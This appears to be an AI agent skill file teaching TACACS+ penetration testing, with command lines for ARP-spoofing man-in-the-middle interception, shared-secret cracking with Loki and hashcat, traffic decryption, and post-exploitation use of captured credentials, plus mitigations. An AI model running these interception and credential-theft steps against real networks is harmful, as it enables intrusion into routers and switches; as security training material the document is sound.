TACACS+ Pentesting

This skill guides you through pentesting TACACS+ (Terminal Access Controller Access Control System Plus) authentication systems. TACACS+ is commonly used to centrally validate users accessing routers, switches, and Network Access Servers (NAS).

When to Use This Skill

Use this skill when:

• You discover port 49/tcp open on a target
• You need to test TACACS+ authentication security
• You want to intercept and analyze TACACS+ traffic
• You're pentesting network infrastructure with AAA services
• You need to brute-force TACACS+ encryption keys
• You want to decrypt captured TACACS+ traffic

Understanding TACACS+

TACACS+ separates authentication, authorization, and accounting (AAA) into distinct services:

• Authentication: Verifies user credentials
• Authorization: Determines what actions users can perform
• Accounting: Logs user activities for auditing

Default port: 49/tcp

Attack Methodology

1. Intercept TACACS+ Traffic

The first step is capturing TACACS+ traffic between clients and the server. This requires positioning yourself in the network path.

Why this matters: TACACS+ encrypts the payload but not the header, making it vulnerable to interception. The encrypted authentication key can be extracted and brute-forced locally without triggering detection in server logs.

How to capture:

# Basic capture on interface
sudo tcpdump -i <interface> -s 0 -w tacacs_capture.pcap port 49

# Filter for specific TACACS server
sudo tcpdump -i <interface> -s 0 -w tacacs_capture.pcap host <tacacs_server_ip> and port 49

2. Perform Man-in-the-Middle Attack

If you're not already in the network path, you may need to perform an ARP spoofing attack to intercept traffic.

Why this matters: ARP spoofing allows you to position yourself between the TACACS client and server, enabling traffic interception.

Tools for MitM:

• arpspoof

  from dsniff package

• bettercap

  for modern networks

• Ettercap

  for comprehensive MitM

Example with arpspoof:

# Terminal 1: Spoof the server to the client
sudo arpspoof -i <interface> -t <client_ip> <server_ip>

# Terminal 2: Spoof the client to the server
sudo arpspoof -i <interface> -t <server_ip> <client_ip>

# Terminal 3: Enable IP forwarding and capture
sudo sysctl -w net.ipv4.ip_forward=1
sudo tcpdump -i <interface> -s 0 -w tacacs_capture.pcap port 49

3. Brute-Force the Encryption Key

Once you have captured TACACS+ traffic, extract the encrypted authentication key and attempt to brute-force it.

Why this matters: TACACS+ typically uses MD5-based encryption for the key. If you crack the key, you can decrypt all captured traffic and extract sensitive information like usernames and commands.

Using Loki:

Loki is a specialized tool for TACACS+ key cracking:

# Install Loki (if not already available)
# Clone from: https://c0decafe.de/svn/codename_loki/trunk/

# Run Loki GUI
sudo loki_gtk.py

# Or use command line
sudo loki.py <capture_file.pcap>

Alternative brute-force approaches:

# Using hashcat (if you can extract the hash)
hashcat -m 0 <hash_file> <wordlist>

# Using custom scripts for dictionary attacks
python scripts/tacacs_bruteforce.py <capture.pcap> <wordlist>

4. Decrypt TACACS+ Traffic

After successfully cracking the key, decrypt the captured traffic to extract sensitive information.

Why this matters: Decrypted traffic reveals usernames, commands executed, and potentially administrative credentials that can be used to gain control of network equipment.

Using Wireshark:

1. Open the capture file in Wireshark
2. Go to Edit → Preferences → Protocols → TACACS+
3. Enter the cracked key in the "Shared Secret" field
4. Click OK and the traffic will be automatically decrypted

What you can extract:

• Banner information from network devices
• Administrative usernames
• Commands executed on devices
• Authentication attempts

Command-line alternative with tshark:

# Decrypt and export to readable format
tshark -r tacacs_capture.pcap -d tacacs+,key,<cracked_key> -T fields -e tacacs.cmdline -e tacacs.username

Post-Exploitation

Once you have credentials from decrypted TACACS+ traffic:

1. Access network equipment: Use extracted credentials to log into routers, switches, or NAS devices
2. Escalate privileges: Look for additional access or misconfigurations
3. Document findings: Record all discovered vulnerabilities and credentials
4. Remediate: Recommend proper key management and network segmentation

Security Recommendations

After pentesting, recommend these mitigations:

• Use strong, unique keys: Avoid default or weak TACACS+ shared secrets
• Implement network segmentation: Limit TACACS+ traffic to management VLANs
• Enable TACACS+ over TLS: Use TACACS+ with additional encryption layers
• Monitor for anomalies: Set up alerts for unusual TACACS+ authentication patterns
• Regular key rotation: Change shared secrets periodically
• Consider RADIUS or 802.1X: Evaluate alternative authentication protocols

Example Workflow

Scenario: You discover port 49 open on a target network during a pentest engagement.

Step-by-step:

1. Reconnaissance: Confirm TACACS+ service is running

   nmap -sV -p 49 <target_ip>
   

2. Position for interception: Set up MitM if needed

   # Use the scripts provided in this skill
   ./scripts/setup_tacacs_capture.sh <interface> <client_ip> <server_ip>
   

3. Capture traffic: Collect TACACS+ packets

   ./scripts/capture_tacacs.sh <interface> <output_file.pcap>
   

4. Brute-force key: Attempt to crack the encryption key

   ./scripts/bruteforce_tacacs_key.sh <capture.pcap> <wordlist>
   

5. Decrypt and analyze: Extract sensitive information

   ./scripts/decrypt_tacacs_traffic.sh <capture.pcap> <cracked_key>
   

Important Notes

• Authorization: Only perform these tests on systems you have explicit permission to test
• Legal compliance: Ensure your activities comply with applicable laws and regulations
• Documentation: Keep detailed records of all testing activities
• Responsible disclosure: Report findings to appropriate stakeholders

References

• Cisco Nightmare: Pentesting Cisco Networks
• Loki TACACS+ Tool
• Wireshark TACACS+ Dissector